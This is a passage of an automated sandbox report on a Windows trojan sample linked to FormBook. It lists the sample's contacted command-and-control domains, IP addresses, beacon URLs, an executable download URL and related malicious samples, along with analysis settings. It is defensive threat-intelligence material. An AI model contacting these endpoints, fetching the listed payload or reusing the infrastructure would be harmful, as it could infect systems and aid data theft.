              https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk0%Avira URL Cloudsafe
              http://185.234.72.101/EuOdzX7Ehz6t1H3.exe0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xn--gotopia-bya.com
              		84.32.84.32
              		truefalse
                		unknown
                www.oyoing.com
                		127.0.0.1
                		truefalse
                  		unknown
                  www.foryourhealth19.com
                  		172.67.194.145
                  		truetrue
                    		unknown
                    botokkkd4.top
                    		43.198.80.127
                    		truetrue
                      		unknown
                      www.ridcoredry.live
                      		91.195.240.123
                      		truetrue
                        		unknown
                        www.86wqi.cyou
                        		38.55.194.30
                        		truetrue
                          		unknown
                          www.tufftiff.xyz
                          		162.0.238.43
                          		truetrue
                            		unknown
                            www.cr-pos.com
                            		192.250.231.28
                            		truetrue
                              		unknown
                              www.erhaltungsmassage.com
                              		217.160.0.31
                              		truetrue
                                		unknown
                                www.lookstudiov.com
                                		74.208.236.162
                                		truetrue
                                  		unknown
                                  www.filmbrute.com
                                  		38.207.19.49
                                  		truetrue
                                    		unknown
                                    www.vivaepicmarbella.com
                                    		46.30.215.51
                                    		truetrue
                                      		unknown
                                      www.cvt-auto.ru
                                      		45.130.41.249
                                      		truetrue
                                        		unknown
                                        www.antifabricated.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.xn--gotopia-bya.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.botokkkd4.top
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.oudcafeae.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                171.39.242.20.in-addr.arpa
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.foryourhealth19.com/ym7q/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.tufftiff.xyz/vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vivaepicmarbella.com/e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.86wqi.cyou/80eg/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.erhaltungsmassage.com/ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lookstudiov.com/u4jq/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hvtrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  http://www.vivaepicmarbella.com/e5cg/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tufftiff.xyz/vwgn/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTftrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.ridcoredry.live/blq3/true
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  http://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.botokkkd4.top/i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMOtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.botokkkd4.top/i6sl/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.filmbrute.com/vgf2/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.86wqi.cyou/80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cr-pos.com/b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cr-pos.com/b9jt/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cvt-auto.ru/1cpo/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xn--gotopia-bya.com/ynea/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://185.234.72.101/EuOdzX7Ehz6t1H3.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabchkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://img.sedoparking.com/templates/bg/NameSiloLogo.pngchkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xn--gotopia-bya.comxQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/ac/?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icochkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Qchkntfs.exe, 0000000E.00000002.3707027734.0000000005B20000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004170000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.namesilo.com/domain/search-domains?query=ridcoredry.livechkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.namesilo.comchkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.sedo.com/services/parking.php3xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaj34fjqh.exe, 00000018.00000002.3098875657.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlkchkntfs.exe, 0000000E.00000002.3707027734.00000000062FA000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.000000000494A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.0.238.43
                                                  		www.tufftiff.xyzCanada
                                                  		22612NAMECHEAP-NETUStrue
                                                  43.198.80.127
                                                  		botokkkd4.topJapan4249LILLY-ASUStrue
                                                  46.30.215.51
                                                  		www.vivaepicmarbella.comDenmark
                                                  		51468ONECOMDKtrue
                                                  217.160.0.31
                                                  		www.erhaltungsmassage.comGermany
                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                  84.32.84.32
                                                  		xn--gotopia-bya.comLithuania
                                                  		33922NTT-LT-ASLTfalse
                                                  91.195.240.123
                                                  		www.ridcoredry.liveGermany
                                                  		47846SEDO-ASDEtrue
                                                  172.67.194.145
                                                  		www.foryourhealth19.comUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  74.208.236.162
                                                  		www.lookstudiov.comUnited States
                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                  192.250.231.28
                                                  		www.cr-pos.comUnited States
                                                  		36454CNSV-LLCUStrue
                                                  185.234.72.101
                                                  		unknownUnited Kingdom
                                                  		30823COMBAHTONcombahtonGmbHDEfalse
                                                  38.55.194.30
                                                  		www.86wqi.cyouUnited States
                                                  		174COGENT-174UStrue
                                                  45.130.41.249
                                                  		www.cvt-auto.ruRussian Federation
                                                  		198610BEGET-ASRUtrue
                                                  38.207.19.49
                                                  		www.filmbrute.comUnited States
                                                  		9009M247GBtrue

                                                  Private

                                                  IP
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1465534
                                                  Start date and time:2024-07-01 19:22:08 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 11m 11s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:24
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:8hd98EhtIFcYkb8.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@11/5@16/14
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 90%
                                                  • Number of executed functions: 90
                                                  • Number of non-executed functions: 277
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: 8hd98EhtIFcYkb8.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  13:23:02API Interceptor1x Sleep call for process: 8hd98EhtIFcYkb8.exe modified
                                                  15:05:14API Interceptor10652050x Sleep call for process: chkntfs.exe modified
                                                  15:07:23API Interceptor13x Sleep call for process: aj34fjqh.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  162.0.238.43Att0027592.exeGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/sr8n/
                                                  8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • www.tufftiff.xyz/vwgn/
                                                  DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/sr8n/
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.tufftiff.xyz/vwgn/
                                                  ELMA _CO LLC_pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.tufftiff.xyz/8mnn/
                                                  AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/sr8n/
                                                  DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/sr8n/?Bh4=PleHf&ej7xa=ykhS0NzI1a5mGwbAHDIJ/kn0uPnJkGx8yP6LKwuh8PX4fvfzVF0WIFVN62SFPKKg+p/2FhJS4HQ3sh57FrIEIaqKUlC3GulKTOZpjTwMPkVUCXJSCA==
                                                  hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/fo0a/
                                                  fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/fo0a/
                                                  tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                                  • www.heolty.xyz/fo0a/
                                                  43.198.80.1278eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • www.botokkkd4.top/i6sl/
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.botokkkd4.top/i6sl/
                                                  46.30.215.518eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • www.vivaepicmarbella.com/e5cg/
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.vivaepicmarbella.com/e5cg/
                                                  217.160.0.31XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                  • www.erhaltungsmassage.com/m8cr/
                                                  SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
                                                  • www.erhaltungsmassage.com/m8cr/
                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                  • www.erhaltungsmassage.com/m8cr/
                                                  SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                                  • haraldhentzschel.com/wp-login.php
                                                  84.32.84.32AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • www.fxlentes.com/e2qo/
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • www.saalameh.com/hfb9/
                                                  8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • www.xn--gotopia-bya.com/ynea/
                                                  eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                                  • www.1stclasstv.net/btrd/?OR-TJfQ=YsBe3zK5mG2re69SuhWD4F+xKefWov63CB1vqe8Fu6/M4t/K701X3Kdgqz8mPZlhNl4Uvg==&2dc=kvXd-rKHCF
                                                  https://antiphishing.vadesecure.com/v4?f=Q3ZQNmU2SnpsRFlRbUF3dnXrUX6IVRqoHkav3zS2FUU4SSgWF2Bh53LuIqIaYuHrQDsnYOK56JKj0hXr4VDw6qL5o_uh_nqnyJa_2on34iQ&i=SXVFem5DOGVpUU1rNjdmQs96J83fcHVCxOlJVucRT2c&k=syJL&r=bWt1djZ5QzcyUms5R1Nzas8e2Z1uyQF5dl89S8qefCBSiTlgrr5sTiH-8ESNqzpA&s=28bc277065cef76943ee4a3e64550f59f4824833fcb12a460650a34e741aba3d&u=http%3A%2F%2Ffranceuniv.frGet hashmaliciousUnknownBrowse
                                                  • franceuniv.fr/
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.xn--gotopia-bya.com/ynea/
                                                  3gQmWdKNmxvFltF.exeGet hashmaliciousFormBookBrowse
                                                  • www.ainude2.cloud/sg8p/
                                                  unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.gamesun.website/t5cf/
                                                  Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.gamesun.website/t5cf/
                                                  Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                  • www.saalameh.com/hfb9/?0N=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&3x=xxOtBHK

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  www.cr-pos.com8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 192.250.231.28
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 192.250.231.28
                                                  Products volume.exeGet hashmaliciousFormBookBrowse
                                                  • 192.250.231.28
                                                  Scan001-929999.exeGet hashmaliciousFormBookBrowse
                                                  • 198.38.83.196
                                                  Axis Bank - 67 Account Pending Bank Receipt.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 198.38.83.196
                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                  • 198.38.83.196
                                                  www.tufftiff.xyz8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.238.43
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.238.43
                                                  ELMA _CO LLC_pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 162.0.238.43
                                                  www.ridcoredry.live8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  Statement of Account.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 91.195.240.123
                                                  Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                                                  • 91.195.240.123
                                                  www.foryourhealth19.com8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.194.145
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.194.145
                                                  Products volume.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.84.156
                                                  www.86wqi.cyou8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 38.55.194.30
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 38.55.194.30
                                                  manufacturer this requirements.exeGet hashmaliciousFormBookBrowse
                                                  • 38.55.194.30
                                                  www.lookstudiov.com8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.162
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.162
                                                  UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.162
                                                  Lowe_list0605002024.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 74.208.236.162
                                                  f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.162
                                                  Sf5Aw7E8Cu.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 74.208.236.162
                                                  www.erhaltungsmassage.com8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.31
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.31
                                                  XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.31
                                                  bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.31
                                                  SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.31
                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.31

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  NTT-LT-ASLThttps://ovexpv.clicks.mlsend.com/ty/cl/eyJ2Ijoie1wiYVwiOjk3MTY5NyxcImxcIjoxMjU2NjAyNTc1MjMzMzY2MzUsXCJyXCI6MTI1NjYwMjkyMTk2NTk4OTEyfSIsInMiOiJjMDRkNjQ0MTU5NWJmNWU5In0Get hashmaliciousUnknownBrowse
                                                  • 84.32.84.140
                                                  https://cts.vresp.com/c/?WaveCompliance/d919e57ba7/b5e5b2a536/185933d903/utm_source=abhi&utm_medium=hr&utm_campaign=emailGet hashmaliciousUnknownBrowse
                                                  • 84.32.84.252
                                                  http://www.thehorizondispatch.comGet hashmaliciousUnknownBrowse
                                                  • 84.32.84.21
                                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.217
                                                  eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                                  • 84.32.84.32
                                                  SecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                                                  • 84.32.84.138
                                                  SecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                                                  • 84.32.84.179
                                                  LILLY-ASUSindent PWS-020199.exeGet hashmaliciousFormBookBrowse
                                                  • 43.132.189.227
                                                  103.162.20.166-sora.arm6-2024-06-28T11_40_37.elfGet hashmaliciousMiraiBrowse
                                                  • 40.36.249.154
                                                  AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 42.170.240.214
                                                  QewpDKdeRJ.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 43.132.28.166
                                                  BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 40.12.31.192
                                                  g75NqH852l.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 43.189.20.23
                                                  V7UaNBrX72.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 40.6.139.124
                                                  EGR7RZv5Km.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 43.7.23.106
                                                  1CZlhmRsza.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 42.141.165.209
                                                  s4WsI8Qcm4.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 43.128.90.95
                                                  ONEANDONE-ASBrauerstrasse48DErPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.72
                                                  yaM8XR1HfL.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • 217.160.0.1
                                                  https://www.asarco.com/Get hashmaliciousUnknownBrowse
                                                  • 74.208.236.164
                                                  Att0027592.exeGet hashmaliciousFormBookBrowse
                                                  • 217.76.156.252
                                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.144
                                                  scan19062024.exeGet hashmaliciousFormBookBrowse
                                                  • 212.227.172.254
                                                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                  • 217.160.0.130
                                                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                  • 217.160.0.130
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • 74.208.236.247
                                                  Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                                  • 212.227.172.254
                                                  NAMECHEAP-NETUSDrawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                  • 198.54.122.135
                                                  Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                                                  • 162.213.255.55
                                                  Att0027592.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.238.43
                                                  Purchase Order Project No.8873_ECOFIX.exeGet hashmaliciousUnknownBrowse
                                                  • 63.250.38.167
                                                  Purchase Order Project No.8873_ECOFIX.exeGet hashmaliciousUnknownBrowse
                                                  • 63.250.38.167
                                                  TT Fizetesi Bizonylat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  • 198.54.126.126
                                                  8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 162.0.238.43
                                                  SecuriteInfo.com.MalwareX-gen.30985.17962.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                  • 198.54.122.135
                                                  https://urlz.fr/qZLcGet hashmaliciousUnknownBrowse
                                                  • 63.250.43.136
                                                  https://readlonghttps-f1d3b6.ingress-florina.ewp.live/wp-content/plugins/wp-file-manager/newversion/pages/region.phpGet hashmaliciousUnknownBrowse
                                                  • 63.250.43.137
